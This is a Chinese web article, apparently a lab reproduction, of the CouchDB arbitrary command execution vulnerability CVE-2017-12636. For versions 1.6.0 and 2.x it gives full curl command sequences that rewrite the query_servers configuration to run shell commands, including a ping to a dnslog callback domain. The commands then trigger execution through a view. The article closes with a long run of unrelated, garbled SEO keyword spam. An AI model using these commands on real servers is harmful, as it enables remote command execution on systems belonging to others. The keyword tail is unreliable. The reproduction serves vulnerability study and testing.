千家信息网

如何进行couchdb 任意命令执行漏洞CVE-2017-12636复现

发表于:2025-12-01 作者:千家信息网编辑
千家信息网最后更新 2025年12月01日,这期内容当中小编将会给大家带来有关如何进行couchdb 任意命令执行漏洞CVE-2017-12636复现,文章内容丰富且以专业的角度为大家分析和叙述,阅读完这篇文章希望大家可以有所收获。CouchD
千家信息网最后更新 2025年12月01日如何进行couchdb 任意命令执行漏洞CVE-2017-12636复现

这期内容当中小编将会给大家带来有关如何进行couchdb 任意命令执行漏洞CVE-2017-12636复现,文章内容丰富且以专业的角度为大家分析和叙述,阅读完这篇文章希望大家可以有所收获。

CouchDB 是一个开源的面向文档的数据库管理系统,可以通过 RESTful JavaScript Object Notation (JSON) API 访问。术语 "Couch" 是 "Cluster Of Unreliable Commodity Hardware" 的首字母缩写,它反映了 CouchDB 的目标具有高度可伸缩性,提供了高可用性和高可靠性,即使运行在容易出现故障的硬件上也是如此。

在2017年11月15日,CVE-2017-12635和CVE-2017-12636披露,CVE-2017-12636是一个任意命令执行漏洞,我们可以通过config api修改couchdb的配置query_server,这个配置项在设计、执行view的时候将被运行。

漏洞影响版本:小于 1.7.0 以及 小于 2.1.1

由于该漏洞利用条件需要登录用户触发,通常配合CVE-2017-12635一起利用

CVE-2017-12635复现文章链接

下面仅作漏洞复现记录与实现,利用流程如下:

1.漏洞环境

目标链接:http://192.168.101.152:5984/

访问链接http://192.168.101.152:5984/_utils/如下

由于Couchdb 2.x和和1.x的的API接口有所差别,导致利用方式也不同,这里演示版本为1.6.0版本

2.漏洞利用

1.6.0漏洞利用:

依次执行以下命令即可触发

其中vulhub:vulhub为管理员的账户密码

curl -X PUT 'http://vulhub:vulhub@192.168.101.152:5984/_config/query_servers/cmd' -d '"ping test.kfqhkz.dnslog.cn"'

curl -X PUT 'http://vulhub:vulhub@192.168.101.152:5984/vultest'

curl -X PUT 'http://vulhub:vulhub@192.168.101.152:5984/vultest/vul' -d '{"_id":"770895a97726d5ca6d70a22173005c7b"}'

curl -X POST 'http://vulhub:vulhub@192.168.101.152:5984/vultest/_temp_view?limit=10' -d '{"language":"cmd","map":""}' -H 'Content-Type:application/json'

执行完毕后查看dnslog

命令执行成功

2.x漏洞利用如下:

Couchdb 2.x 引入了集群,所以修改配置的API需要增加node name。这个其实也简单,我们带上账号密码访问`/_membership`即可:

```
curl http://vulhub:vulhub@your-ip:5984/_membership
```

可见,我们这里只有一个node,名字是`nonode@nohost`。

然后,我们修改`nonode@nohost`的配置:

```
curl -X PUT http://vulhub:vulhub@your-ip:5984/_node/nonode@nohost/_config/query_servers/cmd -d '"id >/tmp/success"'
```

然后,与1.6.0的利用方式相同,我们先增加一个Database和一个Document:

```
curl -X PUT 'http://vulhub:vulhub@your-ip:5984/vultest'
curl -X PUT 'http://vulhub:vulhub@your-ip:5984/vultest/vul' -d '{"_id":"770895a97726d5ca6d70a22173005c7b"}'
```

Couchdb 2.x删除了`_temp_view`,所以我们为了触发`query_servers`中定义的命令,需要添加一个`_view`:

```
curl -X PUT http://vulhub:vulhub@your-ip:5984/vultest/_design/vul -d '{"_id":"_design/test","views":{"wooyun":{"map":""} },"language":"cmd"}' -H "Content-Type: application/json"
```

增加`_view`的同时即触发了`query_servers`中的命令。

上述就是小编为大家分享的如何进行couchdb 任意命令执行漏洞CVE-2017-12636复现了,如果刚好有类似的疑惑,不妨参照上述分析进行理解。如果想知道更多相关知识,欢迎关注行业资讯频道。

漏洞 命令 配置 版本 链接 内容 可以通过 密码 文章 方式 目标 分析 管理 运行 不同 相同 中小 内容丰富 只有 可伸缩性 数据库的安全要保护哪些东西 数据库安全各自的含义是什么 生产安全数据库录入 数据库的安全性及管理 数据库安全策略包含哪些 海淀数据库安全审计系统 建立农村房屋安全信息数据库 易用的数据库客户端支持安全管理 连接数据库失败ssl安全错误 数据库的锁怎样保障安全 计算机网络技术选择题多少分 飞搜科技移动互联网 视频图像管理服务器 全国学生网络安全教育平台 利用网络技术脱贫事例 mc中的ice服务器值多少钱 金山软件开发工程师待遇 哪里可以查服务器的工会 和平精英吃鸡服务器地图怎么调 网络技术指标分析 赴日软件开发面试技术 我们要加强网络安全 电脑服务器端口和地址在哪里 松江区品质软件开发服务产品介绍 计算机软件开发城市排名 网络安全简报范文模板2021 计算机网络技术专业竞争 软件开发工程师题答案 宿州出入库软件开发平台 哪个服务器系统好 网络工程怎样转软件开发 决战平安京服务器设置 网络安全班主任工作报表 用dell的服务器管理软件 摄像头网络安全事件 做软件开发的简称什么意思 鹿泉区新时代软件开发服务装饰 西北工业大学高考数据库 服务器 长鸣 数据库技术物流应用
0